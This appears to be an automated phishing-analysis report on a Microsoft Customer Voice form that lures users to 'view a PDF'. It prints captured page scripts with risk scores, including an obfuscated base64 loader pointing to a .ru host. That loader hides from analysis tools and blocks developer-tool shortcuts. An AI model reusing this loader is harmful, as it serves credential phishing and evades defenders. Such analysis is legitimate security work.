Windows Analysis Report
http://414611

```json{  "brand": "unknown",  "brand_classification": "unknown",  "legit_url": "unknown",  "similarity": 0,  "spoofed": 0,  "reasoning": "The URL 'http://414611' does not resemble any known brand or legitimate URL. It appears to be a numeric string without any recognizable brand name or structure that suggests typosquatting. There are no character substitutions, visual similarities, or structural elements that indicate an attempt to mimic a legitimate brand. Additionally, the URL lacks a domain extension, which further suggests it is not a typical web address. It is likely a placeholder or an internal reference rather than a typosquatting attempt."}

URL: http://414611

{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet appears to be a simple object initialization with timing-related properties. It does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or obfuscation. The script seems to be related to page load timing and performance tracking, which is a common and legitimate use case. Therefore, this script is considered low risk."
}

            window.NavKeyPoints = {
                ServerGetPreviewTime: 0,
                ServerPageTime: 3,
                PageStartTime: Date.now(),
            };
        

{
    "risk_score": 5,
    "reasoning": "The script appears to be handling URL parameters and reloading the page, which could potentially be used for malicious purposes. However, without more context, it's difficult to determine the exact intent. The script uses some potentially risky practices, such as modifying URL parameters and redirecting the user, but it doesn't exhibit clear signs of malicious behavior. Further investigation may be needed to assess the full risk."
}

function reloadNoCdn(){if(!window.isFormReloadNoCdn){window.isFormReloadNoCdn=!0;var o=location,n=o.search;0<n.length&&(n=n.substring(1));for(var s,i,t,a=n.split("&"),e=[],r=a.length,h=0;h<r;h+=1)if(a[h]){if(2===(s=a[h].split("=")).length){if("nocdn"===s[0]&&(s[1]=parseInt(s[1])+1,i=!0,1<s[1]))return;"fswBypass"===s[0]&&(t=!0)}e.push(s.join("="))}i||e.push("nocdn=1"),t||e.push("fswBypass=1");var n="?"+e.join("&"),d=o.protocol+"//"+o.host+o.pathname+n+o.hash;setTimeout(function(){o.href=d},2e3)}}

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a configuration object for a web application, likely related to a customer feedback or survey platform. While it contains some potentially sensitive information like an anti-forgery token, the overall behavior seems to be focused on setting up the application environment and configuration, which is a common practice. There are no clear indicators of high-risk behaviors like dynamic code execution, data exfiltration, or obfuscated code. The script appears to be primarily for legitimate purposes, such as setting up localization, deployment information, and feature flags. Therefore, the risk score is assessed as low."
}

            window.OfficeFormServerInfo = {
                addPrefixForProWhenNoCdn: true,
                antiForgeryToken: "xtxGfnZ4TJ58tZ8nbO7MKUZ_e3bdujAN5JqLTzwUuEzqnbOuM9eWw1xhHOIBYMYyt3TlaHrs4OsfxwbW4oO5MkMw2kiJ_f4KYNi1LEhscYQ1",
                cultureInfo: {"Calendar":{"TwoDigitYearMax":2049},"DateTimeFormat":{"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"AMDesignator":"AM","DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"FirstDayOfWeek":0,"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"PMDesignator":"PM","ShortDatePattern":"M/d/yyyy","ShortTimePattern":"h:mm tt","TimeSeparator":":"},"Name":"en-US"},
                useDebugVersionScript: false,
                deployment: "Production",
                environmentType: "CVProd",
                flights: "CVLazyLoadResourceString;CustomerVoiceDisableStrongCSPSanitize;!ProcessContextParams;FormsPro;FlowEmbed;FormsProMultiCds;PortalFormCardRefactor;FormsProSampleForm;FlowHistory;FormsProContextEmbed;!FormsProDemoView;FormsProInviteSetting;!FormsProDelayedProvisioning;FormsProPipes;FormsProBranching;!EnableVOCForms;FormsProDistributeHome;FormsProQuestionVisibility;FormsProSingleUrl;FormsProOptout;FormsProSignupInformationPage;FormsProDeferredLoad;!FormsProSignupPassThrough;!FormsProCustomCss;MultiLingualMVP1;FormsProFiveByFive;FormsProCustomDomain;PBIFacadeInitialization;FormsProTrial;FormsProSampleFormOnClient;!FormsProBackFill;FormsProO365SuiteHeader;!ProBackfillTeachingBubble;FormsProEnvironmentPicker;FormsProDeferValidationCheck;FormsProCdsPermissions;FormsProShowQuestionNumbers;FormsProEmailableEntitySelector;FormsProQuestionEmbed;!ImmersiveReaderInForms;FormsProLikertOptionExtension;!FormsProDisableAntiFishingNotice;FormsProImportCsv;FormsProBranchingV2;FormsProBranchingImprovement;FormsProEmbedCompact;PrefetchForm;!MenuItemForAddBranch;OwnerInfoOnResponsePage;FormsProEnvStickiness;!FormsProEmbedCompactPlus;!ReactUpgrade;!FormsProHidePrivacyLink;FormsProTextFieldValidation;FormsProRTFooter;FormsProCalculateSentiment;FormsProMultilingualImportExport;FormsProMultilingualImportExportV2;FormsProRatingSmiley;DisplayOptionSetting;ProgressBar;!SplitBasicsJs;FormsProCdsInfoInUrl;FormsProEmbedCodeToHive;!LoadJsByQuestionType;!PrefetchFormInServer;!DelayLoadAriaOdataJs;!YouTubeAdminControl;!IncrementalLoadForms;FormsProMultilingualLocalesIncreasedLimit;FormsProPipeBranching;FormsProPipeDeletePopUp;!DelayLoadThirdPartyJs;!FormsProCustomResponsesPage;EnableFormsProSettings;!AddBranchAndTeachUI;!FormsProHideFooter;!MultilingualLazyLoadResourceString;!LazyLoadResourceString;!LoadThemeInServer;!LoadResourceStringInServer;!PrefetchFormInServerByApi;!MobileQuestionCalloutBugfix;ProgressBarNew;CKEditiorHtmlSource;CustomerVoiceExportFromHive;FormsProCascadingBranching;CustomerVoiceProjectUpdate;!CVTextQuestionLagOptimization;!CustomerVoiceExportFromCDS;CustomerVoiceCustomLanguage;CustomerVoiceShortUrl;!CustomerVoiceExtendedLikert;CustomerVoiceProjectAlert;!CustomerVoiceToyotaCustomFont;ShowCVThemeColorPallet;!OverSurveyManagement;!CustomerVoiceSurveyReminder;CustomerVoiceConditionalThankyou;CVSMQuestionDeletion;CVRatingQuestionSorting;CustomerVoicePauseAndResumeSurvey;ProUseDictForWebSettings;CustomerVoiceInviteMigrationDeletion;!CustomerVoiceEventsWithData;CustomerVoiceInviteMigrationUI;!CustomerVoiceIntegrations;FormsProRemoveEmbedLink;!CustomerVoiceVoluntarySurveyReminder;!CustomerVoiceAutomateSurveyReminder;CVCombineBranchingEngines;!CustomerVoiceToyotaCustomEmailFont;CustomerVoiceCustomHeader;!CustomerVoiceAutomation;CustomerVoiceSurveyScore;!CustomerVoiceLoggedInUserSendEmail;!CustomerVoiceCustomLanguageNYC;!CustomerVoiceSharingV2AllProject;!CustomerVoiceSharingV2AllProjectNewColumn;!CustomerVoiceSharingV2BlockSurvey;!CustomerVoiceFileUpload;!CustomerV

{
    "risk_score": 1,
    "reasoning": "This script appears to be a simple performance tracking snippet, recording the time when the main JavaScript file was loaded. It does not exhibit any high-risk behaviors and is likely part of a legitimate analytics or monitoring system."
}

window.NavKeyPoints.MainJsLoadedTime = Date.now();

{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet appears to be a simple timestamp assignment, which is a common practice for tracking page load times. This behavior does not exhibit any high-risk indicators and is likely part of a legitimate analytics or performance monitoring implementation."
}

window.NavKeyPoints.BasicJsLoadedTime = Date.now();

{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet appears to be a simple timestamp assignment, which is a common practice for tracking the load time of a web page. This behavior does not indicate any high-risk or malicious activities, and it is likely part of a legitimate analytics or performance monitoring implementation."
}

window.NavKeyPoints.MainJsStartTime = Date.now();

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a utility script that handles webpack-related functionality, such as chunk loading and caching. While it uses some techniques that could be considered moderately risky, such as dynamic code execution and external data transmission, the overall context suggests these are likely part of legitimate functionality rather than malicious intent. The script also includes some safeguards and error handling, which reduces the overall risk. Therefore, this script is assessed as low to medium risk."
}

            !function(){"use strict";if("undefined"!=typeof __webpack_require__){var e=__webpack_require__.u;__webpack_require__.u=function(r){return function(e){try{if("function"!=typeof replaceChunkSrc)throw new Error("WebpackRequireFrom: 'replaceChunkSrc' is not a function or not available at runtime. See https://github.com/agoldis/webpack-require-from#troubleshooting");var r=replaceChunkSrc(e);if(!r||"string"!=typeof r)throw new Error("WebpackRequireFrom: 'replaceChunkSrc' does not return string. See https://github.com/agoldis/webpack-require-from#troubleshooting");return r}catch(r){return e}}(e(r))}}!function(){if("undefined"!=typeof __webpack_require__){var e=__webpack_require__.u,r=__webpack_require__.e,n=new Map,t=new Map;__webpack_require__.u=function(r){var t=e(r),o=t.indexOf("?")>-1;return t+(n.has(r)?(o?"&":"?")+n.get(r):"")},__webpack_require__.e=function(o){return r(o).catch((function(r){var a=t.has(o)?t.get(o):2;if(a<1){var i=e(o);throw r.message="Loading chunk "+o+" failed after 2 retries.\n("+i+")",r.request=i,r}return new Promise((function(e){setTimeout((function(){var r="cache-bust=true"+("&retry-attempt="+(2-a+1));n.set(o,r),t.set(o,a-1),e(__webpack_require__.e(o))}),0)}))}))}}}(),"undefined"!=typeof __webpack_require__&&Object.defineProperty(__webpack_require__,"p",{get:function(){try{if("function"!=typeof getChunkPath)throw new Error("WebpackRequireFrom: 'getChunkPath' is not a function or not available at runtime. See https://github.com/agoldis/webpack-require-from#troubleshooting");return getChunkPath()}catch(e){return""}},set:function(e){console.warn("WebpackRequireFrom: something is trying to override webpack public path. Ignoring the new value"+e+".")}});function r(){var e;return null!==(e=window.OfficeFormServerInfo)&&void 0!==e?e:{cultureInfo:{Name:navigator.language},environmentType:"WWProd",serverInfoFromPageHeaders:{},userInfo:{}}}function n(e,r){return void 0===r&&(r=!0),t(e||window.location.search.substring(1),r)}function t(e,r){void 0===r&&(r=!0);var n={};return e&&e.trim().split("&").forEach((function(e){var t=e.indexOf("=");-1===t&&(t=e.length);var o=e.substring(0,t).trim();if(o){var a=e.substring(t+1).trim();n[o]=r?decodeURIComponent(a).trim():a}})),n}var o;!function(e){e[e.signup=1]="signup"}(o||(o={}));var a;function i(){var e,r,o=a||n().Host||(void 0===r&&(r=!0),t(e||window.location.hash.substring(1),r)).Host;switch(o){case"Assignments":case"Bookings":case"Tasks":case"EmbedTestPage":case"Excel":case"Excel_Win32":case"Fluid_Component":case"Loop":case"ODC":case"OneDrive":case"OneNote":case"OneNoteUwp":case"Outlook":case"Outlook_Web_App_Fluid":case"PowerPointContent":case"PowerPointTaskpane":case"ProjectShimla":case"Stream":case"StreamMobile":case"SupplyChainInsights":case"Teams":case"TeamsApproval":case"TeamsBot":case"TeamsPollTab":case"TeamsPollBubble":case"TeamsBotForLife":case"TeamsReports":case"TeamsTab":case"Union":case"Word_Web":case"Word_Web_Fluid":return o;default:return null}}var u,s,c,l,f=(u=function(){var e=function(e,r){void 0===r&&(r=!0);var n=t(e||window.location.search.substring(1),r),o={};return n?(Object.keys(n).forEach((function(e){o[e.toLowerCase()]=n[e]})),o):o}();return!("OneDrive"!==i()||!e.docliburl&&!e.folderuniqueid&&!e.driveid)},c=!1,l=function(){for(var e=[],r=0;r<arguments.length;r++)e[r]=arguments[r];return c?s:(c=!0,s=u.apply(void 0,e))},l.reset=function(){c=!1,s=null},l.getInitializedValue=function(){return c},l);function m(){var e="ms-formweb";if(i()?!f():r().isOembedSPO){var t=i();t&&(e="ms-"+t.toLowerCase()),r().isOembedSPO&&(e="forms-webpart")}return r().isSonarServer&&(e="ms-sonar"),r().isAntiPhishingTool&&(e="ms-antiphishingtool"),"OST"===n().Host&&(e="ms-ost"),e}function p(){return window.NavKeyPoints=window.NavKeyPoints||{},window.NavKeyPoints}var _=void 0!==window.FormPrefetchCache;_?window.FormPrefetchCache.stringCache={data:null,error:null,errorCallback:null,logData:null,state:1,successCallback:null}:window.FormPrefetchCache={formCache:{data:null,err

{
    "risk_score": 8,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` and `decodeURIComponent()` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script attempts to disable common browser security features like the context menu and certain keyboard shortcuts, further suggesting suspicious behavior. Overall, this script poses a significant risk and should be treated with caution."
}

/* The secret of getting ahead is getting started. */
if(atob("aHR0cHM6Ly8zbzFXLnBlYXRpdmVydGhlcmEucnUveUhBcjhyLw==") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNxSkRpaVRkRkV1IGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI3FKRGlpVGRGRXUgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI3FKRGlpVGRGRXUgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojcUpEaWlUZEZFdSBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3FKRGlpVGRGRXUuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogOTBweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI3FKRGlpVGRGRXUgLnRleHQtY2VudGVyIHt0ZXh0LWFsaWduOiBjZW50ZXIhaW1wb3J0YW50O30NCkBtZWRpYSAobWluLXdpZHRoOjk5MnB4KXsNCiNxSkRpaVRkRkV1IC5jb2wtbGctNHtmbGV4OjAgMCBhdXRvO3dpZHRoOjMzLjMzMzMzMzMzJTt9DQp9DQojcUpEaWlUZEZFdSAuZGlzcGxheS00IHtmb250LXNpemU6IDEuMjVyZW0haW1wb3J0YW50O30NCiNxSkRpaVRkRkV1IC5tdC0yIHttYXJnaW4tdG9wOiAwLjVyZW0haW1wb3J0YW50O30NCiNxSkRpaVRkRkV1IC5oNCB7Zm9udC1zaXplOiBjYWxjKC45MDByZW0gKyAuM3Z3KTt9DQojcUpEaWlUZEZFdSAuanVzdGlmeS1jb250ZW50LWNlbnRlcntqdXN0aWZ5LWNvbnRlbnQ6Y2VudGVyIWltcG9ydGFudDt9DQojcUpEaWlUZEZFdS5tdC01e21hcmdpbi10b3A6M3JlbSFpbXBvcnRhbnQ7fQ0KI3FKRGlpVGRGRXUgLm10LTQge21hcmdpbi10b3A6IDFyZW0haW1wb3J0YW50O30NCiNxSkRpaVRkRkV1ICNvTmVoS0hIWUNGIHtjb2xvcjogIzZjNzU3ZDtmb250LXNpemU6MTRweDttYXJnaW4tdG9wOiAuNXJlbTt9DQogICAgPC9zdHlsZT4NCiAgICA8c2NyaXB0Pg0KICAgIGlmIChuYXZpZ2F0b3Iud2ViZHJpdmVyIHx8IHdpbmRvdy5jYWxsUGhhbnRvbSB8fCB3aW5kb3cuX3BoYW50b20gfHwgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmNsdWRlcygiQnVycCIpKSB7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNjcpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDc0KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzIpIHx8DQogICAgICAgIChldmVudC5tZXRhS2V5ICYmIGV2ZW50LmFsdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQuYWx0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3KSB8fA0KICAgICAgICAoZXZlbnQubWV0YUtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkNCiAgICApIHsNCiAgICAgICAgZXZlbnQucHJldmVudERlZmF1bHQoKTsNCiAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgIH0NCn0pOw0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcignY29udGV4dG1lbnUnLCBmdW5jdGlvbihldmVudCkgew0KICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgcmV0dXJuIGZhbHNlOw0KfSk7DQpoSEdoVkdOcm1VID0gZmFsc2U7DQooZnVuY3Rpb24gYnBwTU1iQlFXSSgpIHsNCiAgICBsZXQgeGtMQ21rTFdobCA9IGZhbHNlOw0KICAgIGNvbnN0IGhQVWZLdUxkbVIgPSAxMDA7DQogICAgc2V0SW50ZXJ2YWwoZnVuY3Rpb24oKSB7DQogICAgICAgIGN

{
    "risk_score": 2,
    "reasoning": "The provided JavaScript snippet appears to be a library for linkifying text, which is a common and legitimate functionality. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or obfuscated code. The script uses standard web development practices and does not exhibit any suspicious behavior. While it uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, this script is likely benign and poses a low risk."
}

/*!
 * linkify.js v2.1.8
 * https://github.com/SoapBox/linkifyjs
 * Copyright (c) 2014 SoapBox Innovations Inc.
 * Licensed under the MIT license
 */
!function(){"use strict";var n="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n};!function(e){function a(n,e){var a=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{},t=Object.create(n.prototype);for(var o in a)t[o]=a[o];return t.constructor=e,e.prototype=t,e}function t(n){n=n||{},this.defaultProtocol=n.hasOwnProperty("defaultProtocol")?n.defaultProtocol:h.defaultProtocol,this.events=n.hasOwnProperty("events")?n.events:h.events,this.format=n.hasOwnProperty("format")?n.format:h.format,this.formatHref=n.hasOwnProperty("formatHref")?n.formatHref:h.formatHref,this.nl2br=n.hasOwnProperty("nl2br")?n.nl2br:h.nl2br,this.tagName=n.hasOwnProperty("tagName")?n.tagName:h.tagName,this.target=n.hasOwnProperty("target")?n.target:h.target,this.validate=n.hasOwnProperty("validate")?n.validate:h.validate,this.ignoreTags=[],this.attributes=n.attributes||n.linkAttributes||h.attributes,this.className=n.hasOwnProperty("className")?n.className:n.linkClass||h.className;for(var e=n.hasOwnProperty("ignoreTags")?n.ignoreTags:h.ignoreTags,a=0;a<e.length;a++)this.ignoreTags.push(e[a].toUpperCase())}function o(n,e){for(var a=0;a<n.length;a++)if(n[a]===e)return!0;return!1}function r(n){return n}function i(n,e){return"url"===e?"_blank":null}function s(){return function(n){this.j=[],this.T=n||null}}function c(n,e,a,t){for(var o=0,r=n.length,i=e,s=[],c=void 0;o<r&&(c=i.next(n[o]));)i=c,o++;if(o>=r)return[];for(;o<r-1;)c=new m(t),s.push(c),i.on(n[o],c),i=c,o++;return c=new m(a),s.push(c),i.on(n[r-1],c),s}function l(){return function(n){n&&(this.v=n)}}function u(n){var e=n?{v:n}:{};return a(d,l(),e)}function g(n){return n instanceof x||n instanceof C}var h={defaultProtocol:"http",events:null,format:r,formatHref:r,nl2br:!1,tagName:"a",target:i,validate:!0,ignoreTags:[],attributes:null,className:"linkified"};t.prototype={resolve:function(n){var e=n.toHref(this.defaultProtocol);return{formatted:this.get("format",n.toString(),n),formattedHref:this.get("formatHref",e,n),tagName:this.get("tagName",e,n),className:this.get("className",e,n),target:this.get("target",e,n),events:this.getObject("events",e,n),attributes:this.getObject("attributes",e,n)}},check:function(n){return this.get("validate",n.toString(),n)},get:function(e,a,t){var o=void 0,r=this[e];if(!r)return r;switch("undefined"==typeof r?"undefined":n(r)){case"function":return r(a,t.type);case"object":return o=r.hasOwnProperty(t.type)?r[t.type]:h[e],"function"==typeof o?o(a,t.type):o}return r},getObject:function(n,e,a){var t=this[n];return"function"==typeof t?t(e,a.type):t}};var b=Object.freeze({defaults:h,Options:t,contains:o}),p=s();p.prototype={defaultTransition:!1,on:function(n,e){if(n instanceof Array){for(var a=0;a<n.length;a++)this.j.push([n[a],e]);return this}return this.j.push([n,e]),this},next:function(n){for(var e=0;e<this.j.length;e++){var a=this.j[e],t=a[0],o=a[1];if(this.test(n,t))return o}return this.defaultTransition},accepts:function(){return!!this.T},test:function(n,e){return n===e},emit:function(){return this.T}};var m=a(p,s(),{test:function(n,e){return n===e||e instanceof RegExp&&e.test(n)}}),f=a(p,s(),{jump:function(n){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null,a=this.next(new n(""));return a===this.defaultTransition?(a=new this.constructor(e),this.on(n,a)):e&&(a.T=e),a},test:function(n,e){return n instanceof e}}),d=l();d.prototype={toString:function(){return this.v+""}};var x=u(),y=u("@"),v=u(":"),k=u("."),w=u(),j=u(),z=u("\n"),O=u(),q=u("+"),N=u("#"),S=u(),T=u("mailto:"),A=u("?"),L=u("/"),P=u("_"),E=u(),C=u(),R=u(),H=u("{"),B=u("["),U=u("<"),M=u("("),D=u("}"),I=u("]"),K=u(">"),_=u(")"),G=u("&"),Y=Object.freeze({Base:d,DOMAIN:x,AT:y,COLON:v,DOT:k,PUNCTUATION:w,LO

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false,
  "page_classification": "unknown"
}

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false,
  "page_classification": "unknown"
}

```json{  "brand": "Microsoft",  "brand_classification": "wellknown",  "legit_url": "https://microsoft.com",  "similarity": 7,  "spoofed": 2,  "reasoning": "The URL 'https://customervoice.microsoft.com' uses a subdomain 'customervoice' which is a legitimate and common practice for large organizations like Microsoft to segment different services or campaigns. The main domain 'microsoft.com' is the official domain of the well-known brand Microsoft. There are no character substitutions or visual similarities that suggest typosquatting. The subdomain 'customervoice' does not appear to be misleading or confusing, as it likely refers to a specific service or feedback platform related to Microsoft. Therefore, the likelihood of this being a typosquatting attempt is very low."}

URL: https://customervoice.microsoft.com

{
"contains_trigger_text": true,
"trigger_text": "New PDF Document Received",
"prominent_button_name": "VIEW DOCUMENT HERE",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "file hosting"
}

{
  "brands": "unknown"
}

{
  "brands": "unknown"
}

```json
{
    "risk_score": 1,
    "reasoning": "The script appears to be a module pattern for defining and exporting JavaScript modules. It does not exhibit any high-risk behaviors such as dynamic code execution, data exfiltration, or obfuscation. The use of legacy practices like `XDomainRequest` is noted, but it is not inherently malicious. Overall, the script seems to be benign with no harmful intent."
}

!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var i=t();for(var n in i)("object"==typeof exports?exports:e)[n]=i[n]}}(this,function(){return function(e){function t(n){if(i[n])return i[n].exports;var r=i[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,t),r.l=!0,r.exports}var i={};return t.m=e,t.c=i,t.i=function(e){return e},t.d=function(e,i,n){t.o(e,i)||Object.defineProperty(e,i,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var i=e&&e.e?function(){return e.default}:function(){return e};return t.d(i,"a",i),i},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="",t(t.s=30)}([function(e,t,i){"use strict";Object.defineProperty(t,"__esModule",{value:!0});!function(e){e[e.Unspecified=0]="Unspecified",e[e.String=1]="String",e[e.Int64=2]="Int64",e[e.Double=3]="Double",e[e.Boolean=4]="Boolean",e[e.Date=5]="Date"}(t.AWTPropertyType||(t.AWTPropertyType={}));!function(e){e[e.NotSet=0]="NotSet",e[e.DistinguishedName=1]="DistinguishedName",e[e.GenericData=2]="GenericData",e[e.IPV4Address=3]="IPV4Address",e[e.IPv6Address=4]="IPv6Address",e[e.MailSubject=5]="MailSubject",e[e.PhoneNumber=6]="PhoneNumber",e[e.QueryString=7]="QueryString",e[e.SipAddress=8]="SipAddress",e[e.SmtpAddress=9]="SmtpAddress",e[e.Identity=10]="Identity",e[e.Uri=11]="Uri",e[e.Fqdn=12]="Fqdn",e[e.IPV4AddressLegacy=13]="IPV4AddressLegacy"}(t.AWTPiiKind||(t.AWTPiiKind={}));!function(e){e[e.NotSet=0]="NotSet",e[e.GenericContent=1]="GenericContent"}(t.AWTCustomerContentKind||(t.AWTCustomerContentKind={}));!function(e){e[e.Low=1]="Low",e[e.Normal=2]="Normal",e[e.High=3]="High",e[e.Immediate_sync=5]="Immediate_sync"}(t.AWTEventPriority||(t.AWTEventPriority={}));!function(e){e[e.NonRetryableStatus=1]="NonRetryableStatus",e[e.QueueFull=3]="QueueFull"}(t.AWTEventsDroppedReason||(t.AWTEventsDroppedReason={}));!function(e){e[e.InvalidEvent=1]="InvalidEvent",e[e.SizeLimitExceeded=2]="SizeLimitExceeded",e[e.KillSwitch=3]="KillSwitch"}(t.AWTEventsRejectedReason||(t.AWTEventsRejectedReason={}))},function(e,t,i){"use strict";function n(e){var t=new B.Int64("0");return t.low=4294967295&e,t.high=Math.floor(e/4294967296),t}function r(){return"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(C,function(e){var t=16*Math.random()|0;return("x"===e?t:3&t|8).toString(16)})}function o(e){return"string"==typeof e}function s(e){return"number"==typeof e}function a(e){return"boolean"==typeof e}function u(e){return e instanceof Date}function d(e){return(e+b)*R}function c(e){var t=e.indexOf("-");return t>-1?e.substring(0,t):""}function _(){return O===D&&(O="undefined"!=typeof navigator&&Boolean(navigator.sendBeacon)),O}function l(){return N===D&&(N="undefined"!=typeof Uint8Array&&!W()&&!y()),N}function p(e){return!(!s(e)||!(e>=1&&e<=3||5===e))}function f(e,i){return!t.PropertyNameRegex.test(e)||P(i)?D:(P(i.value)&&(i={value:i,type:w.AWTPropertyType.Unspecified}),i.type=m(i.value,i.type),i.type?(u(i.value)&&(i.value=d(i.value.getTime())),i.pii>0&&i.cc>0?D:i.pii?A(i.pii)?i:D:i.cc?I(i.cc)?i:D:i):D)}function h(e){return e.getUTCFullYear()+"-"+T(e.getUTCMonth()+1)+"-"+T(e.getUTCDate())+"T"+T(e.getUTCHours())+":"+T(e.getUTCMinutes())+":"+T(e.getUTCSeconds())+"."+g(e.getUTCMilliseconds())+"Z"}function v(){if(M===D){var e=new XMLHttpRequest;M=void 0===e.withCredentials&&"undefined"!=typeof XDomainRequest}return M}function y(){return!("undefined"==typeof navigator||!navigator.product)&&"ReactNative"===navigator.product}function T(e){return e<10?"0"+e:e.toString()}function g(e){return e<10?"00"+e:e<100?"0"+e:e.toString()}function 